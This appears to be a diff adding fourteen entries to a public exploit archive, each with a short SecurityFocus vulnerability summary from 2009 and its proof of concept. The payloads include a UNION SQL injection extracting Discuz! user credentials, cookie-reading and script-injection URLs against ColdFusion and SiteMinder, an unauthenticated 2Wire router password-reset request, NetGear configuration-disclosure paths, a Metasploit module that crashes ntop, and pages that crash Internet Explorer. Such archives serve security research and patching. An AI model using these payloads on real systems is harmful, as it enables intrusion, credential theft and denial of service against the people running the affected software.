Updated 05_05_2014

files.csv

@@ -29898,3 +29898,17 @@ id,file,description,date,author,platform,type,port
 33161,platforms/php/local/33161.php,"PHP 5.3 'mail.log' Configuration Option 'open_basedir' Restriction Bypass Vulnerability",2009-08-10,"Maksymilian Arciemowicz",php,local,0
 33162,platforms/php/remote/33162.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (1)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
 33163,platforms/php/remote/33163.php,"PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosure Vulnerability (2)",2009-08-10,"Maksymilian Arciemowicz",php,remote,0
+33164,platforms/multiple/remote/33164.txt,"WebKit Floating Point Number Remote Buffer Overflow Vulnerability",2009-08-11,Apple,multiple,remote,0
+33165,platforms/hardware/remote/33165.txt,"2Wire Routers 'CD35_SETUP_01' Access Validation Vulnerability",2009-08-12,hkm,hardware,remote,0
+33166,platforms/php/webapps/33166.txt,"Discuz! 6.0 '2fly_gift.php' SQL Injection Vulnerability",2009-08-15,Securitylab.ir,php,webapps,0
+33167,platforms/cfm/webapps/33167.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_authenticatewizarduser.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33168,platforms/cfm/webapps/33168.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/logviewer/searchlog.cfm startRow Parameter XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33169,platforms/cfm/webapps/33169.txt,"Adobe ColdFusion Server <= 8.0.1 wizards/common/_logintowizard.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33170,platforms/cfm/webapps/33170.txt,"Adobe ColdFusion Server <= 8.0.1 administrator/enter.cfm Query String XSS",2009-08-17,"Alexander Polyakov",cfm,webapps,0
+33171,platforms/asp/webapps/33171.txt,"DUWare DUgallery 3.0 'admin/edit.asp' Authentication Bypass Vulnerability",2009-08-17,spymeta,asp,webapps,0
+33173,platforms/windows/dos/33173.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (1)",2007-02-07,trevordixon,windows,dos,0
+33174,platforms/windows/dos/33174.html,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (2)",2007-02-07,trevordixon,windows,dos,0
+33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 'li' Element Denial of Service Vulnerability (3)",2007-02-07,trevordixon,windows,dos,0
+33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 HTTP Basic Authentication NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-18,"Brad Antoniewicz",linux,dos,0
+33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
+33178,platforms/php/webapps/33178.txt,"Computer Associates SiteMinder '%00' Cross Site Scripting Protection Security Bypass Vulnerability",2009-06-08,"Arshan Dabirsiaghi",php,webapps,0

platforms/asp/webapps/33171.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36049/info
+
+DUgallery is prone to an authentication-bypass vulnerability.
+
+An attacker can exploit this issue to gain unauthorized administrative access to the affected application. Successfully exploiting this issue will lead to other attacks.
+
+DUgallery 3.0 is vulnerable; other versions may also be affected. 
+
+The following example URI is available:
+
+http://www.example.com/Accessories/admin/edit.asp?iPic=[PictureID] 

platforms/cfm/webapps/33167.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Adobe ColdFusion 8.0.1 and earlier are vulnerable. 
+
+http://www.example.com:8500/CFIDE/wizards/common/_authenticatewizarduser.cfm?>&#039;"><script>alert(&#039;DSECRG_XSS&#039;)</script>

platforms/cfm/webapps/33168.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+ 
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+ 
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+ 
+Adobe ColdFusion 8.0.1 and earlier are vulnerable. 
+
+http://www.example.com:8500/CFIDE/administrator/logviewer/searchlog.cfm?viewShort=0&sortBy=&filter=CurrentFilter&startRow=22%22%20%20STYLE=%22background-image:url(javascript:alert(%27%DF%20%E7%E4%E5%F1%FC%20%E1%FB%EB%27))%22%3E

platforms/cfm/webapps/33169.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+  
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+  
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+  
+Adobe ColdFusion 8.0.1 and earlier are vulnerable. 
+
+http://www.example.com:8500/CFIDE/wizards/common/_logintowizard.cfm?>&#039;"><script>alert(&#039;DSECRG_XSS&#039;)</script>

platforms/cfm/webapps/33170.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36046/info
+   
+Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+   
+Attacker-supplied HTML and script code would run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+   
+Adobe ColdFusion 8.0.1 and earlier are vulnerable. 
+
+http://www.example.com:8500/CFIDE/administrator/enter.cfm?>&#039;"><script>alert(&#039;DSECRG_XSS&#039;)</script>

platforms/hardware/remote/33165.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36031/info
+
+Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions.
+
+Unauthenticated attackers can leverage this issue to change the router's administrative password. Successful attacks will completely compromise affected devices.
+
+2Wire routers prior to Firmware version 5.29.135.5 are vulnerable. 
+
+The following example URIs are available:
+
+http://gateway.example.net?xslt?page=CD35_SETUP_01
+http://gateway.example.net/xslt?PAGE=CD35_SETUP_01_POST&password1=*Ax512*&password2=*Ax512* 

platforms/hardware/remote/33177.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/36076/info
+
+The NetGear WNR2000 is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information.
+
+A remote attacker exploit these issues to obtain sensitive information, possibly aiding in further attacks.
+
+NOTE: Information obtained in attacks may be used in exploits targeting the vulnerability covered in BID 36094 (NetGear WNR2000 'upg_restore.cgi' Authentication Bypass Vulnerability).
+
+The WNR2000 with firmware 1.2.0.8 is vulnerable; other firmware versions may also be affected. 
+
+The following example URIs are available:
+
+http://www.example.com/router-info.htm
+http://www.example.com/cgi-bin/router-info.htm
+http://www.example.com/cgi-bin/NETGEAR_WNR2000.cfg 

platforms/linux/dos/33176.rb

@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/36074/info
+
+The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects ntop 3.3.10; other versions may also be affected. 
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+        include Msf::Exploit::Remote::HttpClient
+        include Msf::Auxiliary::Dos
+
+        def initialize(info = {})
+                super(update_info(info,
+                        'Name'           => 'NTOP <= 3.3.10 Basic Authorization DoS',
+                        'Description'    => %q{
+                                A denial of service condition can be reached by specifying an invalid value for the Authorization
+                                HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on
+                                a colon. When no colon exists in the decoded string the username is left at its default NULL value.
+                                During the authentication process the length of the username is computed via strlen(), which results
+                                in a segmentation fault when it processes the null value.
+                        },
+                        'Author'         => 'Brad Antoniewicz <brad.antoniewicz@foundstone.com>',
+                        'License'        => MSF_LICENSE,
+                        'Version'        => '1',
+                        'References'     => [
+                                [ 'BID', 'None'],
+                                [ 'CVE', 'CVE-2009-2732']
+
+                        ],
+                        'DisclosureDate' => 'Aug 08 2009'))
+                        register_options( [Opt::RPORT(3000),], self.class )
+
+        end
+
+        def run
+                begin
+                        o = {
+                                'uri' => '/configNtop.html',
+                                'headers' => {
+                                        'Authorization' => 'Basic A=='
+                                }
+                        }
+
+                        c = connect(o)
+                        c.send_request(c.request_raw(o))
+
+                        print_status("Request sent to #{rhost}:#{rport}")
+                rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+                        print_status("Couldn't connect to #{rhost}:#{rport}")
+                rescue ::Timeout::Error, ::Errno::EPIPE
+                end
+        end
+end

platforms/multiple/remote/33164.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/36023/info
+
+WebKit is prone to a remote buffer-overflow vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected. 
+
+
+Example 1:
+---------
+<script>
+var Overflow = "31337" + 0.313373133731337313373133731337...;
+</script>
+---------
+
+Example 2:
+---------
+<img width=0.3133731337313373133731337... src="31337.jpg">
+--------- 

platforms/php/webapps/33166.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36044/info
+
+Discuz! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Discuz! 6.0 is affected; other versions may also be vulnerable. 
+
+The following example URI is available:
+
+http://www.example.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members 

platforms/php/webapps/33178.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36086/info
+
+Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input.
+
+An attacker can exploit this issue to bypass cross-site scripting protections. Successful exploits can aid in further attacks.
+
+We don't know which versions of SiteMinder are affected. We will update this BID when more details become available. 
+
+http://www.example.com/app/function?foo=bar%00<script>alert(document.cookie)</script>

platforms/windows/dos/33173.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+
+Versions prior to Internet Explorer 8 beta 2 are vulnerable. 
+
+<html> <head> <title>IE Crash Example</title> </head> <body> <button type="button" onclick="document.createElement('li').value = null;">null - Okay</button> <button type="button" onclick="document.createElement('li').value = 0;">0 - Okay</button> <button type="button" onclick="document.createElement('li').value = 1;">1 - Crash</button> <button type="button" onclick="document.createElement('li').value = '1';">'1' - Crash</button> <button type="button" onclick="document.createElement('li').value = true;">true - Crash</button> <button type="button" onclick="document.createElement('li').value = 'true';">'true' - Okay</button> <button type="button" onclick="document.createElement('li').value = false;">false - Okay</button> <button type="button" onclick="document.createElement('li').value = [];">[] - Okay</button> <button type="button" onclick="document.createElement('li').value = [1];">[1] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['1'];">['1'] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['true'];">['true'] - Okay</button> <button type="button" onclick="document.createElement('li').value = {};">{} - Okay</button> <button type="button" onclick="document.createElement('li').value = {count:1};">{count:1} - Okay</button> <button type="button" onclick="document.createElement('li').value = undefined;">undefined - Okay</button> <button type="button" onclick="document.createElement('li').value = function(){};">function(){} - Okay</button> </body> </html> 

platforms/windows/dos/33174.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+ 
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+ 
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+ 
+Versions prior to Internet Explorer 8 beta 2 are vulnerable. 
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><title>IE crash bug</title> <script type="text/javascript"> var li = document.createElement("li"); li.setAttribute("value", "1"); // this crashes IE! li.value = "1"; // this also crashes IE! </script> </head><body> <h1>IE crash bug test</h1> </body></html> 

platforms/windows/dos/33175.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36070/info
+  
+Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
+  
+Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. Given the nature of this issue, attackers may also be able to corrupt process memory and run arbitrary code, but this has not been confirmed.
+  
+Versions prior to Internet Explorer 8 beta 2 are vulnerable. 
+
+document.createElement('li').setattribute('value', 'KillIE7');